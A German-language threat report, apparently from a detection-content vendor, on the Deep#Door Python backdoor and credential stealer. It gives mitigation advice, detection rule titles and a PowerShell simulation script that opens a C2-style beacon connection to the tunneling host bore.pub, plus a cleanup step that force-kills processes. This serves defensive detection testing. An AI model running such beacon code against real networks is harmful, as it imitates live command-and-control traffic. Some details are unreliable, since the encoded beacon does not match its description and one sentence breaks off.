SOC Prime Bias: Kritisch

04 May 2026 17:21 UTC

Deep#Door Stealer: Heimlicher Python-Backdoor und Anmeldeinformations-Dieb, der Tunneling, mehrschichtige Persistenz und In-Memory-Überwachungsfähigkeiten nutzt

Author Photo
SOC Prime Team linkedin icon Folgen
Deep#Door Stealer: Heimlicher Python-Backdoor und Anmeldeinformations-Dieb, der Tunneling, mehrschichtige Persistenz und In-Memory-Überwachungsfähigkeiten nutzt
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Der Bericht untersucht Deep#Door, eine heimliche, auf Python basierende Backdoor, die über einen verschleierten Batch-Loader geliefert wird, der seine bösartige Nutzlast zur Laufzeit einbettet und rekonstruiert. Die Malware nutzt einen öffentlichen TCP-Tunneldienst für die Steuerungs- und Kontrollkommunikation, richtet mehrere Persistenzmechanismen ein, schwächt Windows-Sicherheitskontrollen und unterstützt umfassende Überwachungs- und Anmeldeinformationsdiebstahlaktivitäten. Außerdem führt sie detaillierte Umweltüberprüfungen durch, um Sandboxes und Analysten zu entgehen, während sie sich auf API-Patching im Arbeitsspeicher verlässt, um während der Ausführung verborgen zu bleiben.

Untersuchung

Securonix Forscher kartierten die gesamte Infektionskette vom initialen Batch-Skript bis zur Nutzlast-Extraktion, Rekonstruktion und Ausführung des finalen Python RAT. Ihre Analyse identifizierte den Missbrauch von bore.pub zum Tunneln, dynamisch generierte Ports und eine benutzerdefinierte Authentifizierungssequenz, die für den Betreiberzugang verwendet wird. Der Bericht enthielt auch eine detaillierte Beschreibung der Methoden zur Umgehung von Verteidigungsmaßnahmen, Persistenztechniken, Systementsdeckungsroutinen und dem Verhalten der Datenexfiltration.

Abmilderung

Verteidiger sollten die Skriptausführung genau überwachen, PowerShell-Protokollierung aktivieren, unerlaubte Änderungen an Microsoft Defender und Firewall-Einstellungen erkennen und Start-Einträge, Run-Schlüssel und zugehörige Persistenzorte überprüfen. Die Netzwerküberwachung sollte sich auch auf ausgehende Verbindungen zu bore.pub und ungewöhnliche Aktivitäten auf hohen Ports konzentrieren. EDR-Tools, die in der Lage sind, API-Patching und Manipulation im Arbeitsspeicher zu erkennen, können die Sichtbarkeit dieser Bedrohung weiter verbessern.

Reaktion

Wenn Deep#Door Aktivität erkannt wird, sollte der betroffene Endpunkt sofort isoliert, der bösartige Python-Prozess beendet, alle Persistenzmechanismen einschließlich Startskripten, Run-Schlüsseln und WMI-Abonnements entfernt und modifizierte Defender- und Protokollierungseinstellungen wiederhergestellt werden. Sicherheitsteams sollten auch eine Speicher- und forensische Analyse durchführen, um versteckte Implantate zu identifizieren und das Ausmaß des Anmeldedaten-Diebstahls zu bewerten, während die Netzwerkkommunikation zu bore.pub.

Angriffsfluss

Erkennungen

Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (über registry_event)

SOC Prime Team
01. Mai 2026

Verdächtige PowerShell-Strings (über cmdline)

SOC Prime Team
01. Mai 2026

Verdächtige .NET-Klassen/Methoden-Aufrufe von PowerShell-Befehlszeile (über process_creation)

SOC Prime Team
01. Mai 2026

Mögliche Remote-Systementdeckung oder Verbindungs-Check (über cmdline)

SOC Prime Team
01. Mai 2026

Mögliche Konto- oder Gruppenauflistung/-manipulation (über cmdline)

SOC Prime Team
01. Mai 2026

Mögliche Nutzung von Timeout zur verzögerten Ausführung (über cmdline)

SOC Prime Team
01. Mai 2026

LOLBAS WScript / CScript (über process_creation)

SOC Prime Team
01. Mai 2026

Echtzeit-Überwachung von Windows Defender deaktivieren und andere Einstellungen ändern (über cmdline)

SOC Prime Team
01. Mai 2026

Verdächtige PowerShell-Strings (über powershell)

SOC Prime Team
01. Mai 2026

Verdächtige Änderungen an den Windows Defender-Einstellungen (über powershell)

SOC Prime Team
01. Mai 2026

Verdächtige Binärdateien/Skripte im Autostart-Ort (über file_event)

SOC Prime Team
01. Mai 2026

IOCs (HashSha256) zur Erkennung: Deep#Door Stealer: Heimliche Python-Backdoor und Anmeldeinformations-Hacker, der Tunneling, mehrschichtige Persistenz und Überwachungsfähigkeiten im Arbeitsspeicher nutzt

SOC Prime AI-Regeln
01. Mai 2026

Erkennung von C2-Kommunikation über öffentlichen TCP-Tunneldienst [Windows-Netzwerkverbindung]

SOC Prime AI-Regeln
01. Mai 2026

PowerShell-Befehl zur Extraktion der eingebetteten Python-Nutzlast [Windows PowerShell]

SOC Prime AI-Regeln
01. Mai 2026

Erkennung der Bereitstellung der heimlichen Python-Backdoor Deep#Door [Windows-Prozesserstellung]

SOC Prime AI-Regeln
01. Mai 2026

Erkennung des Einsatzes des TCP-Tunnelingdienstes bore.pub für C2-Kommunikation [Windows-Netzwerkverbindung]

SOC Prime AI-Regeln
01. Mai 2026

Echtzeit- und Verhaltensüberwachung von Windows Defender deaktiviert [Windows PowerShell]

SOC Prime AI-Regeln
01. Mai 2026

Ausführung des verschleierten Batch-Skripts Deep#Door [Windows-Prozesserstellung]

SOC Prime AI-Regeln
01. Mai 2026

PowerShell-Befehl zur Deaktivierung von Windows Defender-Funktionen [Windows PowerShell]

SOC Prime AI-Regeln
01. Mai 2026

Erkennung der Ausführung der heimlichen Python-Backdoor Deep#Door [Windows-Prozesserstellung]

SOC Prime AI-Regeln
01. Mai 2026

Erkennung der heimlichen C2-Kommunikation über bore.pub [Windows-Netzwerkverbindung]

SOC Prime AI-Regeln
01. Mai 2026

Erkennung des Deep#Door-Stealers unter Verwendung von PowerShell und Firewall-Manipulation [Windows PowerShell]

SOC Prime AI-Regeln
01. Mai 2026

Simulationsausführung

Voraussetzung: Der Telemetrie- und Basislinien-Vorflugtest muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Adversary-Technik (TTP), die zur Auslösung der Erkennungsregel ausgelegt ist. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

  • Angriffs-Erzählung & Befehle:

    Ein Angreifer, der auf dem Windows-Host mit niedrigen Privilegien Fuß gefasst hat, möchte einen heimlichen C2-Kanal über die öffentlich bekannte bore.pub vom Deep#Door genutzte Tunneldienst einrichten. Um sich mit legitimen Datenverkehr zu vermischen, wählt der Angreifer einen Port aus dem Bereich 41.234-41.243 (vom Malware ausgewählt) und verwendet PowerShell’s System.Net.Sockets.TcpClient Klasse, um eine rohe TCP-Verbindung zu öffnen. Die Verbindung wird für kurze Zeit im Leerlauf gehalten, um einen Herzschlag zu simulieren, bevor ein kleines base-64-codiertes Beacon übertragen wird.

  • Regressionstest-Skript:

    # Simuliere Deep#Door C2-Beacon zu bore.pub auf einem zufälligen Port innerhalb des überwachten Bereichs
    $domain = 'bore.pub'
    $port = Get-Random -Minimum 41234 -Maximum 41244 # Obergrenze ist exklusiv
    try {
        Write-Host "Verbindung zu $domain:$port wird aufgebaut ..."
        $client = New-Object System.Net.Sockets.TcpClient
        $client.Connect($domain, $port)
        $stream = $client.GetStream()
    
        # Minimaler Beacon-Nutzlast (z.B., ein base64-codiertes "ping")
        $payload = [System.Text.Encoding]::ASCII.GetBytes('cGlja2V0')
        $stream.Write($payload,0,$payload.Length)
        Write-Host "Beacon gesendet. Verbindung wird für 5 Sekunden gehalten..."
        Start-Sleep -Seconds 5
    }
    catch {
        Write-Error "Verbindung fehlgeschlagen: $_"
    }
    finally {
        if ($stream) { $stream.Close() }
        if ($client) { $client.Close() }
        Write-Host "Verbindung geschlossen."
    }
  • Aufräum-Befehle:

    # Keine persistierenden Artefakte; sicherstellen, dass keine verbleibenden TCP-Verbindungen bestehen
    Get-NetTCPConnection -RemotePort 41234-41243 -State Established | ForEach-Object {
        Stop-Process -Id $_.OwningProcess -Force
    }
    Write-Host "Aufräumen abgeschlossen."

Ende des Berichts